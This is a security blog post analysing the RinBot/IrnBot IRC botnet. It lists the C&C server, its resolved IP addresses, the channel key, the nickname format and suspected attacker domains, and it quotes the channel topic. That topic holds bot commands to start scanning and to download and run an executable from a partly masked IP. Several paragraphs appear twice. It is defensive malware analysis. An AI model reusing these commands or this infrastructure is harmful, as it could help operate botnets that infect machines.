IrnBot enjoys the attention from Offensive Computing.
OffensiveComputing is a community of anti-malware experts from all parts of the world.
They posted a blog entry about a the recent RinBot, aka Irnbot, aka VanBot.
When looking at the disassembly, the author appears to want his bot called 'IrnBot'......
The author seems to enjoy the attention his bot is attracting. 'Im-a-drone'...err, Irnbot has made references to Symantec, CNN, and now our friends over at Offensive Computing. Each time he's mentioned he uses the new found fame on the next bot code update. Last time I saw something this entertaining is back when Witlog was running.
The MS.exe file is his 'spammer' application, which connects to http://66.xxx.xxx.9/x/getConfig.php to launch a spam run.
His current spam topic is: Analysis: Verdict puts focus on Cheney
Note the channel key: hellovalsmit or Hello Val Smith, Val Smith is the CTO of Offensive Computing.
This guy appears to own or control these domains:
x.anti-viral.us
is.wayne.brady.gonna.have.to.chokeabitch.us
x.rofflewaffles.us
mx.sbn01.to
ircd.myadv.biz
They posted a blog entry about a the recent RinBot, aka Irnbot, aka VanBot.
When looking at the disassembly, the author appears to want his bot called 'IrnBot'......
The author seems to enjoy the attention his bot is attracting. 'Im-a-drone'...err, Irnbot has made references to Symantec, CNN, and now our friends over at Offensive Computing. Each time he's mentioned he uses the new found fame on the next bot code update. Last time I saw something this entertaining is back when Witlog was running.
http://58.xx.xxx.39/asm.exe (66a92827c333cb1d43762f33535a6d61)
IRC Based C&C at: x.anti-viral.us:8080
x.anti-viral.us has address 164.58.226.10
x.anti-viral.us has address 218.27.101.46
x.anti-viral.us has address 150.208.128.13
x.anti-viral.us has address 82.193.223.230
x.anti-viral.us has address 138.80.9.178
x.anti-viral.us has address 85.185.251.131
x.anti-viral.us has address 207.47.230.31
x.anti-viral.us has address 69.181.7.244
x.anti-viral.us has address 211.43.206.127
Uses nickname format: [XP|USA|P|00|jibberish]
User connect String: XP-USA 0 0 :[XP|USA|P|00|jibberish]
Channel: ##OC
Key: hellovalsmit
:s013.xnet.net 332 [XP|USA|P|00|] ##OC :.scan.stop
-s;.scan.start N 30 -s;.scan.start N 30 -a -s;.scan.start N x.x.x.x 30
-s;.scan.start M 15 -a -s;.scan.start M 15 -s;.scan.start M x.x.x.x 15
-s;.scan.start S 15 -a -s;.scan.start S 15 -s;.scan.start S x.x.x.x 15
-s;.download Off3ns1v3C0mputingD0wnload http://210.xx.xx.118/MS.exe
c:\m.exe -e -s
The MS.exe file is his 'spammer' application, which connects to http://66.xxx.xxx.9/x/getConfig.php to launch a spam run.
His current spam topic is: Analysis: Verdict puts focus on Cheney
Note the channel key: hellovalsmit or Hello Val Smith, Val Smith is the CTO of Offensive Computing.
This guy appears to own or control these domains:
x.anti-viral.us
is.wayne.brady.gonna.have.to.chokeabitch.us
x.rofflewaffles.us
mx.sbn01.to
ircd.myadv.biz
posted by Nicholas at
19:49
<< Home